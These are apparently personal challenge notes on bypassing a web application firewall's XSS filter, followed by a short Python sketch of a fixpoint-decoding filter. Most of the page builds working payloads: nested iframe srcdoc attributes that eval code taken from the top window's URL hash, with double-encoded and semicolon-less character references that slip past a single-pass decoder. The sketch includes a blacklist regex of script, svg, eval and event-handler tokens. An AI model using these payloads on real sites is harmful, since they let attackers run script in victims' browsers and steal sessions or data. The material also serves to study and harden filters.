notes

iframe in iframe (waf xss filter bypass)

2020-09-07

challenge

blacklist:

<svg>
<script>
and all events (e.g. onload, onerror, onclick, etc...)
eval, alert, prompt, confirm, etc...

whitelist:

<iframe src="" srcdoc="">

but blocked:

<iframe src="%09javascript">
<iframe src="data">
<iframe srcdoc="<script">
<iframe srcdoc="&lt;script">
etc...

ok. i will try to solve...

payload:

<script>eval(location.hash.substring`1`)</script>

first step
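i will use two iframes, so the script runs two frames below the top window and the payload needs `parent` twice (`parent.parent`) to read the top window's `location.hash`.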

<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>

second step

<iframe srcdoc="<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>"></iframe>

magic

change the first char of `script` and `eval` to a hex character reference

<iframe srcdoc="<iframe srcdoc='<&#x73;cript>&#x65;val(parent.parent.location.hash.substring`1`)</&#x73;cript>'></iframe>"></iframe>
or dec code
<iframe srcdoc="<iframe srcdoc='<&#115;cript>&#101;val(parent.parent.location.hash.substring`1`)</&#115;cript>'></iframe>"></iframe>
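this payload is blocked: the waf decodes `&#` and `&#x` references before matching

but... encode the `&`, `#` or `x` of the reference itself. each `srcdoc` attribute is decoded once by the browser, so with two nested iframes the reference is decoded twice, and the waf only sees the first layer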

<iframe srcdoc="<iframe srcdoc='<&amp;#x73;cript>&&#x23;x65;val(parent.parent.location.hash.substring`1`)</&#&#x78;73;cript>'></iframe>"></iframe>
Booom!

interesting

if a decimal reference is used and the next char is not a digit, then the semicolon is not required
if a hex reference is used and the next char is not a digit or [a-f], then the semicolon is not required
if a named entity is used and the next char is not [a-z], then the semicolon is not required

without semicolon

<iframe srcdoc="<iframe srcdoc='&#x26lt&amp#115cript>&&#x23x65val(parent.parent.location.hash.substring`1`)</&amp#115cript>'></iframe>"></iframe>
second booom!
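
From the filter's side, both bypasses above come down to matching after a single decoding pass. The sketch below is an added example, not code from the original notes or from the waf in the challenge: it decodes character references until the text stops changing and only then applies the blacklist. The `BLOCKED` regex, the round limit and the function names are assumptions; the three sample strings are the payloads already shown on this page.

```python
import html
import re

# Tokens from the page's blacklist; the regex itself is an assumption.
BLOCKED = re.compile(r"<\s*(script|svg)|\beval\b|\bon\w+\s*=", re.I)
MAX_ROUNDS = 8  # cap so hostile input cannot force unbounded decoding

# Payloads copied from this page: single-encoded, re-encoded, no semicolons.
SINGLE = r"""<iframe srcdoc="<iframe srcdoc='<&#x73;cript>&#x65;val(parent.parent.location.hash.substring`1`)</&#x73;cript>'></iframe>"></iframe>"""
DOUBLE = r"""<iframe srcdoc="<iframe srcdoc='<&amp;#x73;cript>&&#x23;x65;val(parent.parent.location.hash.substring`1`)</&#&#x78;73;cript>'></iframe>"></iframe>"""
NO_SEMI = r"""<iframe srcdoc="<iframe srcdoc='&#x26lt&amp#115cript>&&#x23x65val(parent.parent.location.hash.substring`1`)</&amp#115cript>'></iframe>"></iframe>"""


def decode_to_fixpoint(value, max_rounds=MAX_ROUNDS):
    """Decode character references until the text stops changing.

    Returns (text, rounds, settled). html.unescape follows the HTML5 rules,
    including references with no trailing semicolon, and decodes slightly
    more eagerly than a browser does inside attributes (the safe direction).
    """
    for rounds in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            return value, rounds, True
        value = decoded
    return value, max_rounds, html.unescape(value) == value


def single_pass_blocks(value):
    """Assumed model of the filter on this page: decode once, then match."""
    return bool(BLOCKED.search(html.unescape(value)))


def fixpoint_blocks(value):
    """Match on the fully decoded text; fail closed if it never settles."""
    text, _, settled = decode_to_fixpoint(value)
    return not settled or bool(BLOCKED.search(text))


if __name__ == "__main__":
    for name, p in (("single", SINGLE), ("double", DOUBLE), ("no-semi", NO_SEMI)):
        print(name, single_pass_blocks(p), fixpoint_blocks(p), decode_to_fixpoint(p)[1])
```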